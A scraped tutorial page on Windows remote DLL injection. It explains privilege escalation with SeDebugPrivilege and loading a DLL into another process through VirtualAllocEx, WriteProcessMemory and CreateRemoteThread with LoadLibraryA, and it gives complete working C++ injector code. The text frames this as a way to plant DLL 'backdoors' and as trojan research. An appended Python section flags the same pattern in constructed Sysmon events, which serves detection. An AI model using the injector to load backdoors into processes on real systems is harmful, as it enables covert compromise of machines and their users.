DLL Remote injection instance

Source: Internet
Author: User

 

Generally, each process has its own private address space, and in theory other processes are not allowed to operate on it. However, there are ways to get into that space and write code into a running process; this is what remote injection means.
I have not discussed writing DLL backdoors much. Now let's look at writing the executable that implements the injection:
The functions used include:

OpenProcessToken();
LookupPrivilegeValue();
AdjustTokenPrivileges();
OpenProcess();
VirtualAllocEx();
WriteProcessMemory();
GetProcAddress();
CreateRemoteThread();

 

 

First, a brief introduction to what these functions do. Because we need to operate on other processes in the system, we cannot write to, or even read, the memory of other processes unless we have sufficient privileges. Therefore we first raise our privileges with the following three functions:

OpenProcessToken();      // Open the process token
LookupPrivilegeValue();  // Returns the locally unique ID (LUID) the system uses for a named privilege
AdjustTokenPrivileges(); // As the English name says, it changes the privileges of the process token

 

 

 

 

Enter the memory space of the host process
Once we have the privilege to enter the host process's space, we need to put code into its memory that loads our backdoor. We can use the LoadLibraryA() function to load our DLL; it only needs the DLL's file path. So we need to write the DLL file path into the host's memory space, because that path does not yet exist in the memory of the host process. The following functions are used:

OpenProcess();        // Opens the host process so that some of its attributes can be modified. For details, see MSDN
VirtualAllocEx();     // Allocates memory in the host's address space to hold the DLL file name
WriteProcessMemory(); // Writes the DLL file name into the allocated space

 

 

 

Start a new thread in the host
LoadLibraryA() does the loading, but its entry address must be known before it can be used. Therefore GetProcAddress() is used to obtain the entry address; with that address, CreateRemoteThread() can start a new thread in the host. At this point the entire injection process is complete, though it is not very polished yet; that is left to the smart ones ;).

Simple Example:

 

#include <windows.h>
#include <iostream>

// Enable a named privilege (for example SE_DEBUG_NAME) on the current process token
BOOL EnableDebugPriv(LPCTSTR name)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;
    LUID luid;

    // Open the token of the current process
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return FALSE;
    // Obtain the locally unique ID of the privilege
    if (!LookupPrivilegeValue(NULL, name, &luid))
    {
        CloseHandle(hToken);
        return FALSE;
    }

    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    tp.Privileges[0].Luid = luid;
    // Adjust the privileges of the token
    BOOL ok = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
    CloseHandle(hToken);
    return ok;
}

// **************************************************************************************************

BOOL InjectDll(const char* dllFullPath, const DWORD dwRemoteProcessId)
{
    HANDLE hRemoteProcess;
    EnableDebugPriv(SE_DEBUG_NAME);
    // Open the remote process
    hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwRemoteProcessId);
    if (hRemoteProcess == NULL)
    {
        std::cout << "OpenProcess failed!" << std::endl;
        return FALSE;
    }

    char* pszLibFileRemote;

    // Use VirtualAllocEx to allocate space for the DLL file name in the address space of the remote process
    pszLibFileRemote = (char*)VirtualAllocEx(hRemoteProcess, NULL, lstrlenA(dllFullPath) + 1, MEM_COMMIT, PAGE_READWRITE);
    if (pszLibFileRemote == NULL)
    {
        std::cout << "VirtualAllocEx failed!" << std::endl;
        CloseHandle(hRemoteProcess);
        return FALSE;
    }

    // Use WriteProcessMemory to write the DLL path name into the memory space of the remote process
    WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (void*)dllFullPath, lstrlenA(dllFullPath) + 1, NULL);

    // ##############################################################################
    // Work out the entry address of LoadLibraryA
    PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
        GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
    // (GetModuleHandle and GetProcAddress functions)

    // Start a remote thread whose start routine is LoadLibraryA; the new thread runs inside the remote process
    HANDLE hRemoteThread;
    if ((hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL)) == NULL)
    {
        std::cout << "Injection thread failed!" << std::endl;
        CloseHandle(hRemoteProcess);
        return FALSE;
    }
    // ##############################################################################

    /*
    // The statements between the // ##### markers can also be replaced by the following:
    DWORD dwId;
    LPVOID pFunc = LoadLibraryA;
    HANDLE hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFunc, pszLibFileRemote, 0, &dwId);
    // Does it feel much simpler?
    */

    // Release the handles
    CloseHandle(hRemoteProcess);
    CloseHandle(hRemoteThread);

    return TRUE;
}

// **************************************************************************************************

int main()
{
    InjectDll("C:\\zr1_zr.dll", 3060); // This number is the ID of the process you want to inject
    return 0;
}

 

 

On NT operating systems, the EnableDebugPriv() function implementation can be removed. Research on trojan technology is fundamental.
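The injector above leaves a recognisable trace: the injecting process first opens the target with PROCESS_ALL_ACCESS, then creates a remote thread whose start routine is a LoadLibrary export in kernel32. The following detection logic is an added example written for this page, not part of the original article; it runs over constructed Sysmon-style records (Event ID 10 ProcessAccess and Event ID 8 CreateRemoteThread, using Sysmon's real field names) and flags exactly that sequence.

```python
from typing import Dict, List

# Constructed Sysmon-style records in "Key: value|Key: value" form (fabricated samples, not real telemetry).
# Event ID 10 = ProcessAccess, Event ID 8 = CreateRemoteThread.
SAMPLE_EVENTS = [
    "EventID: 10|SourceImage: C:\\tools\\inject.exe|SourceProcessId: 4812"
    "|TargetImage: C:\\Windows\\explorer.exe|TargetProcessId: 3060|GrantedAccess: 0x1FFFFF",
    "EventID: 8|SourceImage: C:\\tools\\inject.exe|SourceProcessId: 4812"
    "|TargetImage: C:\\Windows\\explorer.exe|TargetProcessId: 3060"
    "|StartModule: C:\\Windows\\System32\\KERNEL32.DLL|StartFunction: LoadLibraryA",
    "EventID: 8|SourceImage: C:\\Program Files\\Vendor\\agent.exe|SourceProcessId: 2200"
    "|TargetImage: C:\\Windows\\System32\\svchost.exe|TargetProcessId: 1188"
    "|StartModule: C:\\Windows\\System32\\ntdll.dll|StartFunction: RtlUserThreadStart",
    "EventID: 1|Image: C:\\Windows\\System32\\notepad.exe|ProcessId: 5100",
]

LOADER_EXPORTS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}
PROCESS_ALL_ACCESS = 0x1FFFFF  # value of the Win32 constant on current Windows versions


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'Key: value|Key: value' record into a dict."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return fields


def is_loadlibrary_remote_thread(ev: Dict[str, str]) -> bool:
    """Event 8 whose start routine is a LoadLibrary export: the thread the article's injector creates."""
    return ev.get("EventID") == "8" and ev.get("StartFunction") in LOADER_EXPORTS


def find_injections(lines: List[str]) -> List[Dict[str, object]]:
    """Flag LoadLibrary remote threads and note whether the same source had opened the target with full access."""
    events = [parse_event(line) for line in lines]
    full_access = set()
    for ev in events:
        if ev.get("EventID") == "10":
            granted = int(ev.get("GrantedAccess", "0"), 16)
            if granted & PROCESS_ALL_ACCESS == PROCESS_ALL_ACCESS:
                full_access.add((ev["SourceProcessId"], ev["TargetProcessId"]))
    hits = []
    for ev in events:
        if is_loadlibrary_remote_thread(ev):
            key = (ev["SourceProcessId"], ev["TargetProcessId"])
            hits.append({"source": ev["SourceImage"], "target": ev["TargetImage"],
                         "function": ev["StartFunction"], "opened_with_all_access": key in full_access})
    return hits
```

A thread started at RtlUserThreadStart by an endpoint agent is left alone, so the check keys on the LoadLibrary start routine rather than on remote-thread creation in general.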

 
